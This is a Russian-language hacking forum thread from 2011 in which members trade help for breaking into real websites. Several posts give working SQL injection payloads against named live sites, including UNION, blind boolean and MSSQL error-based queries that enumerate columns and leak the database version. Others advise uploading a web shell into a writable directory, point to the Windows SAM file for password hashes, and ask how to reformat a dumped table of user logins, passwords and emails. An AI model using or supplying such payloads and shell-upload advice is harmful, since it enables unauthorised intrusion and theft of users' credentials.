Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Обычное внедрение SQL-кода в запрос:
    Code:
    SELECT * FROM products WHERE category_id in (SQL) and hidden=0 ...
    Можно просто сделать так:
    Code:
    1) and 1=2 UNION SELECT ...#
    Советую обратиться к документации MySQL.
     
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Что-то не получается вывести так версию БД
    Покажи запрос полностью.
    http://aqua-st.ru/catalog/102%20order%20by%201#
     
    #17722 FlaktW, 22 Aug 2011
    Last edited: 22 Aug 2011
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    http://*******.ru/catalog/102)and(0)=(1)union(select(1),2,3)#
    Если твой браузер не отправляет в запросах символ '#', используй сниферы с возможностью изменения запросов на лету (в Charles - Ctrl+Shift+W, Rules, Type=Path, Match=^(.*)$, Replace=$1#)
    Число столбцов подбирать придется вручную. Возможно, я ошибаюсь, но их не менее 999 ;)

    upd:
    Все-таки ошибся.
    При правильном количестве столбцов ошибки в запросе
    больше нет. Но она есть во втором запросе
    Как видно из второго запроса, он вызовет ту же ошибку, поэтому софт пропустил правильное количество при прямом переборе.
    Использовать union не получится. Только как слепую крутить.

    Столбцов, как оказалось, 27.
    102)and(1)=if(((select(count(*))from(information_schema.columns)where(table_name=0x70726F6475637473)and(table_schema=database()))>26),1,0)#
    true

    102)and(1)=if(((select(count(*))from(information_schema.columns)where(table_name=0x70726F6475637473)and(table_schema=database()))>27),1,0)#
    false
     
    #17723 M_script, 22 Aug 2011
    Last edited: 23 Aug 2011
    1 person likes this.
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    # - %23
    % - %25
    Это надо запомнить, и не мучиться с Charles(В большинстве случаев).
     
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Че правда так можно? Не обманываешь? :eek:
    Ты пример посмотри. Там не в параметрах инъекция.
     
  6. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Пароли от учетных записей в нынешних операционных системах не хранятся. Найти можно только hash пароля. Если тебе нужен hash пароля учетной записи то он в windows хранится в SAM файле. Тебе в system32.
     
  7. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    я второго юзера через батник сделал, но всёравно спасибо)
     
  8. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    можно какнибудь запустить службу удаленного управления компьютером через встроеную в всо консоль?
     
  9. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,174
    Likes Received:
    617
    Reputations:
    690
    ну если у тебя получилось запустить батник, почему бы и не запускать службы ?
    net start "имя службы"
     
    _________________________
  10. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?
     
  11. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Не рутать, а получить права админа. Для этого есть эксплоиты, для начала посмотри это видео: https://forum.antichat.net/showpost.php?p=2770920&postcount=1
     
  12. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Народ) собсно такой вопрос...
    Вообщем есть скуль с правами Y, но нет папки на запись... инклуда тоже нет = \
    Вообщем то нарыл доступ по ssh к этому серверу.....
    но права у юзера уг
    у моего юзера например директория /home/myuser а сайт лежит в дириктории /home/siteuser/
    Можно ли как то залить шелл в корень сайта?)
    Порутать сервак не получится = \ т.к.
    Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
    Есть какие нибудь варианты как залить шелл ?))
     
  13. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Почему обязательно в корень сайта? Можно залить и скажем в images и другие подобные директории открытые на запись.. А потом, если необходимо, переместить шелл в корень...
    Через SSH просмотри в /home/siteuser/ любую открытую на запись директорию, и лей, лей..
     
    1 person likes this.
  14. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    здравствуйте, нашел интересную иньекцию, судя по всему mssql.Если в данной форме
    ввести кавычку, вылетает ошибка.Как такое можно раскрутить?
     
  15. RexTiam

    RexTiam Member

    Joined:
    2 Nov 2009
    Messages:
    117
    Likes Received:
    45
    Reputations:
    5
    KUKLOVOD2, там не только эта бага)
    но ссылку твою не получилось раскрутить
     
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    POST http://www.socketmobile.com/support/wifi/pw.asp
    POSTDATA(вариант 1): Email=1')+UNION+SELECT+1,2,@@version,4--+&submit=Send+Registration+Key
    POSTDATA(вариант 2):
    Email=asd')+OR+1=@@version--+&submit=Send+Registration+Key


    Result:
    Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
     
    #17736 Tigger, 25 Aug 2011
    Last edited: 25 Aug 2011
    6 people like this.
  17. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе
    мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку:
    видим следующее:Invalid column name 'code'.Почему так?
    Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять?
     
  18. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    мб пишу не в правильную тему, но возникла такая проблема.
    Сдампил бд mssql, там вот такой вид:

    Code:
    
    
    
    INSERT INTO tbl_xxx(id,password,accounttype,birthdate,BCodeTU,Email) VALUES ('login       ','password   ','0','Jan 01 1900 12:00AM','0','email');
    
    как привести такие строчки к виду
    Code:
    mail;pass
    ???
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    сделай импорт базы, дальше возьми данные селектом, ну или спарси дамп))
     
    _________________________
  20. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    а как дамп спарсить?)))
     
Thread Status:
Not open for further replies.